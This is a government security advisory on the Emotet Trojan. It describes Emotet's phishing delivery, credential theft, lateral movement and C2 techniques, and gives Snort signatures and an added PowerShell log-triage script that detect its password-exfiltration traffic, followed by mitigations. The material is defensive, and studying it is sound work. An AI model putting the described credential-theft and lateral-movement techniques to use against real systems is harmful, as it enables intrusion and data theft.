This information is provided "as is" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.

The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.

Revisions
  • October 9, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

October 6, 2020

AA20-280A: Emotet Malware

Original release date: October 6, 2020
Summary

This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.

This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC).

Emotet—a sophisticated Trojan commonly functioning as a downloader or dropper of other malware—resurged in July 2020, after a dormant period that began in February. Since August, CISA and MS-ISAC have seen a significant increase in malicious cyber actors targeting state and local governments with Emotet phishing emails. This increase has rendered Emotet one of the most prevalent ongoing threats.

To secure against Emotet, CISA and MS-ISAC recommend implementing the mitigation measures described in this Alert, which include applying protocols that block suspicious attachments, using antivirus software, and blocking suspicious IPs.

Technical Details

Emotet is an advanced Trojan primarily spread via phishing email attachments and links that, once clicked, launch the payload (Phishing: Spearphishing Attachment [T1566.001], Phishing: Spearphishing Link [T1566.002]). The malware then attempts to proliferate within a network by brute forcing user credentials and writing to shared drives (Brute Force: Password Guessing [T1110.001], Valid Accounts: Local Accounts [T1078.003], Remote Services: SMB/Windows Admin Shares [T1021.002]).

Emotet is difficult to combat because of its “worm-like” features that enable network-wide infections. Additionally, Emotet uses modular Dynamic Link Libraries to continuously evolve and update its capabilities.

Since July 2020, CISA has seen increased activity involving Emotet-associated indicators. During that time, CISA’s EINSTEIN Intrusion Detection System, which protects federal, civilian executive branch networks, has detected roughly 16,000 alerts related to Emotet activity. CISA observed Emotet being executed in phases during possible targeted campaigns. Emotet used compromised Word documents (.doc) attached to phishing emails as initial insertion vectors. Possible command and control network traffic involved HTTP POST requests to Uniform Resource Identifiers consisting of nonsensical random length alphabetical directories to known Emotet-related domains or IPs with the following user agent string (Application Layer Protocol: Web Protocols [T1071.001]).

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR

Traffic to known Emotet-related domains or IPs occurred most commonly over ports 80, 8080, and 443. In one instance, traffic from an Emotet-related IP attempted to connect to a suspected compromised site over port 445, possibly indicating the use of Server Message Block exploitation frameworks along with Emotet (Exploitation of Remote Services [T1210]). Figure 1 lays out Emotet’s use of enterprise techniques.

Figure 1: MITRE ATT&CK enterprise techniques used by Emotet

Timeline of Activity

The following timeline identifies key Emotet activity observed in 2020.

  • February: Cybercriminals targeted non-U.S. countries using COVID-19-themed phishing emails to lure victims to download Emotet.[1]
  • July: Researchers spotted emails with previously used Emotet URLs, particularly those used in the February campaign, targeting U.S. businesses with COVID-19-themed lures.[2]
  • August:
    • Security researchers observed a 1,000 percent increase in downloads of the Emotet loader. Following this change, antivirus software firms adjusted their detection heuristics to compensate, leading to decreases in observed loader downloads.[3]  
    • Proofpoint researchers noted mostly minimal changes in most tactics and tools previously used with Emotet. Significant changes included:
      • Emotet delivering Qbot affiliate partner01 as the primary payload and
      • The Emotet mail sending module’s ability to deliver benign and malicious attachments.[4]
    • CISA and MS-ISAC observed increased attacks in the United States, particularly cyber actors using Emotet to target state and local governments.
  • September:
    • Cyber agencies and researchers alerted the public of surges of Emotet, including compromises in Canada, France, Japan, New Zealand, Italy, and the Netherlands. Emotet botnets were observed dropping Trickbot to deliver ransomware payloads against some victims and Qakbot Trojans to steal banking credentials and data from other targets.[5],[6],[7],[8]
    • Security researchers from Microsoft identified a pivot in tactics from the Emotet campaign. The new tactics include attaching password-protected archive files (e.g., Zip files) to emails to bypass email security gateways. These email messages purport to deliver documents created on mobile devices to lure targeted users into enabling macros to “view” the documents—an action which actually enables the delivery of malware.[9]
    • Palo Alto Networks reported cyber actors using thread hijacking to spread Emotet. This attack technique involves stealing an existing email chain from an infected host to reply to the chain—using a spoofed identity—and attaching a malicious document to trick recipients into opening the file.[10]

MITRE ATT&CK Techniques

According to MITRE, Emotet uses the ATT&CK techniques listed in table 1.

Table 1: Common exploit tools

Technique | Use

OS Credential Dumping: LSASS Memory [T1003.001]
    Emotet has been observed dropping password grabber modules including Mimikatz.

Remote Services: SMB/Windows Admin Shares [T1021.002]
    Emotet leverages the Admin$ share for lateral movement once the local admin password has been brute forced.

Obfuscated Files or Information [T1027]
    Emotet has obfuscated macros within malicious documents to hide the URLs hosting the malware, cmd.exe arguments, and PowerShell scripts.

Obfuscated Files or Information: Software Packing [T1027.002]
    Emotet has used custom packers to protect its payloads.

Network Sniffing [T1040]
    Emotet has been observed to hook network APIs to monitor network traffic.

Exfiltration Over C2 Channel [T1041]
    Emotet has been seen exfiltrating system information stored within cookies sent within an HTTP GET request back to its command and control (C2) servers.

Windows Management Instrumentation [T1047]
    Emotet has used WMI to execute powershell.exe.

Process Injection: Dynamic-link Library Injection [T1055.001]
    Emotet has been observed injecting into Explorer.exe and other processes.

Process Discovery [T1057]
    Emotet has been observed enumerating local processes.

Command and Scripting Interpreter: PowerShell [T1059.001]
    Emotet has used PowerShell to retrieve the malicious payload and download additional resources like Mimikatz.

Command and Scripting Interpreter: Windows Command Shell [T1059.003]
    Emotet has used cmd.exe to run a PowerShell script.

Command and Scripting Interpreter: Visual Basic [T1059.005]
    Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads.

Valid Accounts: Local Accounts [T1078.003]
    Emotet can brute force a local admin password, then use it to facilitate lateral movement.

Account Discovery: Email Account [T1087.003]
    Emotet has been observed leveraging a module that can scrape email addresses from Outlook.

Brute Force: Password Guessing [T1110.001]
    Emotet has been observed using a hard-coded list of passwords to brute force user accounts.

Email Collection: Local Email Collection [T1114.001]
    Emotet has been observed leveraging a module that scrapes email data from Outlook.

User Execution: Malicious Link [T1204.001]
    Emotet has relied upon users clicking on a malicious link delivered through spearphishing.

User Execution: Malicious File [T1204.002]
    Emotet has relied upon users clicking on a malicious attachment delivered through spearphishing.

Exploitation of Remote Services [T1210]
    Emotet has been seen exploiting SMB via a vulnerability exploit like ETERNALBLUE (MS17-010) to achieve lateral movement and propagation.

Create or Modify System Process: Windows Service [T1543.003]
    Emotet has been observed creating new services to maintain persistence.

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]
    Emotet has been observed adding the downloaded payload to the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key to maintain persistence.

Scheduled Task/Job: Scheduled Task [T1053.005]
    Emotet has maintained persistence through a scheduled task.

Unsecured Credentials: Credentials In Files [T1552.001]
    Emotet has been observed leveraging a module that retrieves passwords stored on a system for the current logged-on user.

Credentials from Password Stores: Credentials from Web Browsers [T1555.003]
    Emotet has been observed dropping browser password grabber modules.

Archive Collected Data [T1560]
    Emotet has been observed encrypting the data it collects before sending it to the C2 server.

Phishing: Spearphishing Attachment [T1566.001]
    Emotet has been delivered by phishing emails containing attachments.

Phishing: Spearphishing Link [T1566.002]
    Emotet has been delivered by phishing emails containing links.

Non-Standard Port [T1571]
    Emotet has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to using ports commonly associated with HTTP/HTTPS.

Encrypted Channel: Asymmetric Cryptography [T1573.002]
    Emotet is known to use RSA keys for encrypting C2 traffic.

Detection Signatures

MS-ISAC developed the following Snort signature for use in detecting network activity associated with Emotet activity.

alert tcp $HOME_NET any -> $EXTERNAL_NET 443 (msg:"[CIS] Emotet C2 Traffic Using Form Data to Send Passwords"; content:"POST"; http_method; content:"Content-Type|3a 20|multipart/form-data|3b 20|boundary="; http_header; fast_pattern; content:"Content-Disposition|3a 20|form-data|3b 20|name=|22|"; http_client_body; content:!"------WebKitFormBoundary"; http_client_body; content:!"Cookie|3a|"; pcre:"/:?(chrome|firefox|safari|opera|ie|edge) passwords/i"; reference:url,cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/; sid:1; rev:2;)

CISA developed the following Snort signatures for use in detecting network activity associated with Emotet activity. Note: Uniform Resource Identifiers should contain a random length alphabetical multiple directory string, and activity will likely be over ports 80, 8080, or 443.

alert tcp any any -> any $HTTP_PORTS (msg:"EMOTET:HTTP URI GET contains '/wp-content/###/'"; sid:00000000; rev:1; flow:established,to_server; content:"/wp-content/"; http_uri; content:"/"; http_uri; distance:0; within:4; content:"GET"; nocase; http_method; urilen:<17; classtype:http-uri; content:"Connection|3a 20|Keep-Alive|0d 0a|"; http_header; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:"EMOTET:HTTP URI GET contains '/wp-admin/###/'"; sid:00000000; rev:1; flow:established,to_server; content:"/wp-admin/"; http_uri; content:"/"; http_uri; distance:0; within:4; content:"GET"; nocase; http_method; urilen:<15; content:"Connection|3a 20|Keep-Alive|0d 0a|"; http_header; classtype:http-uri; metadata:service http;)
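As an added example that is not part of the advisory, the PowerShell below applies the traffic pattern described under Technical Details (HTTP POST to a URI made only of random alphabetical directories, over ports 80, 8080 or 443, with the listed user agent) to proxy log lines, as a host-side complement to the Snort rules above. The log format, the sample lines and the 203.0.113.10 address are constructed for this example; the user agent is matched as a prefix because the page's copy of the string is truncated.

```powershell
# Added example, not from the advisory. Flags proxy-log lines matching the
# Emotet C2 pattern described in the Technical Details section.

# The page's copy of the user agent is cut off, so only its leading part is used.
$EmotetUserAgentPrefix = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2;'

# Two or more path segments made of letters only, with an optional trailing
# slash, and nothing else (no file name, extension or query string).
$RandomAlphaDirs = '^(/[A-Za-z]+){2,}/?$'

function Test-EmotetC2Request {
    param(
        [Parameter(Mandatory)][string]$Method,
        [Parameter(Mandatory)][string]$Uri,
        [Parameter(Mandatory)][int]$Port,
        [Parameter(Mandatory)][string]$UserAgent
    )
    return (($Method -eq 'POST') -and
            ($Port -in @(80, 8080, 443)) -and
            ($Uri -match $RandomAlphaDirs) -and
            $UserAgent.StartsWith($EmotetUserAgentPrefix))
}

function Find-EmotetC2Candidates {
    # Constructed log format, one request per line:
    #   <timestamp> <client> <method> <host>:<port> <uri> "<user agent>"
    param([Parameter(Mandatory)][string[]]$Lines)

    $pattern = '^(?<ts>\S+)\s+(?<client>\S+)\s+(?<method>[A-Z]+)\s+(?<host>[^\s:]+):(?<port>\d+)\s+(?<uri>\S+)\s+"(?<ua>[^"]*)"$'
    foreach ($line in $Lines) {
        if ($line -notmatch $pattern) { continue }
        $m = $Matches   # keep this line's groups; later -match calls replace $Matches
        $hit = Test-EmotetC2Request -Method $m['method'] -Uri $m['uri'] `
                                    -Port ([int]$m['port']) -UserAgent $m['ua']
        if ($hit) {
            [pscustomobject]@{
                Time   = $m['ts']
                Client = $m['client']
                Host   = $m['host']
                Port   = [int]$m['port']
                Uri    = $m['uri']
            }
        }
    }
}

# Constructed sample: one benign request and two that match the pattern.
$sample = @(
    '2020-10-06T10:00:01Z 10.1.2.3 GET www.example.com:443 /index.html "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '2020-10-06T10:00:05Z 10.1.2.3 POST 203.0.113.10:8080 /kxqzv/wnrpqlc/ "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729)"',
    '2020-10-06T10:00:09Z 10.1.2.3 POST 203.0.113.10:80 /abc/def/ghijk "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727)"'
)
# Expected: the two POST lines are reported, the GET line is not.
Find-EmotetC2Candidates -Lines $sample | Format-Table -AutoSize
```

A match is a candidate for triage, not a confirmation: confirm the destination against current Emotet indicators and the host's process activity before acting.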

Mitigations

CISA and MS-ISAC recommend that network defenders—in federal, state, local, tribal, territorial governments, and the private sector—consider applying the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes prior to implementation to avoid unwanted impacts.

  • Block email attachments commonly associated with malware (e.g., .dll and .exe).
  • Block email attachments that cannot be scanned by antivirus software (e.g., .zip files).
  • Implement Group Policy Object and firewall rules.
  • Implement an antivirus program and a formalized patch management process.
  • Implement filters at the email gateway, and block suspicious IP addresses at the firewall.
  • Adhere to the principle of least privilege.
  • Implement a Domain-Based Message Authentication, Reporting & Conformance validation system.
  • Segment and segregate networks and functions.
  • Limit unnecessary lateral communications.
  • Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Enforce multi-factor authentication.
  • Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See Using Caution with Email Attachments.
  • Enable a firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious email attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to suspicious or risky sites.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).
  • Scan all software downloaded from the internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate access control lists.
  • Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.
  • See CISA’s Alert on Technical Approaches to Uncovering and Remediating Malicious Activity for more information on addressing potential incidents and applying best practice incident response procedures.
  • See the joint CISA and MS-ISAC Ransomware Guide on how to be proactive and prevent ransomware attacks from happening and for a detailed approach on how to respond to an attack and best resolve the cyber incident.

For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops.

Revisions
  • October 6, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.